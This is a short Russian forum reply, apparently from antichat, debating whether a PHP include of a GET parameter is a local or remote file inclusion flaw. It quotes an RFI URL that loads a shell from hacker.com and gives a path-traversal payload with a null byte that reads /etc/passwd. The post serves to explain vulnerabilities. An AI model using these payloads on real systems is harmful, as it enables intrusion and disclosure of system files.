2 DDoSька:
это врядли можно продемонстрировать полноценно, когда выложено только:
PHP код:
include("page".$GET['id'].".php");
Чтобы понять, что тут КОНКРЕТНЫЙ LFI, просто прочтите то, чему вы поверите:
http://forum.antichat.ru/thread23501.html
и не надо меня впредь просить искать уязвимость в коде:
остальной код (скрытый) имеет значение, для демонстрации уязвимости, когда просят именно так - "нет ты скажи, как именно здесь можно всё похерить"
/index.php?page=http://hacker.com/shell.php).
В скрипте nilux`не проинклудилось бы
а я не говорил о RFI, тут LFI, что очень часто достаточно
т.е. например:
/index.php?page=../../../../../../../../../../../../../../../../../../../../etc/passwd%00 очень даже просто могло бы, при определенных обстоятельствах, дать свои плоды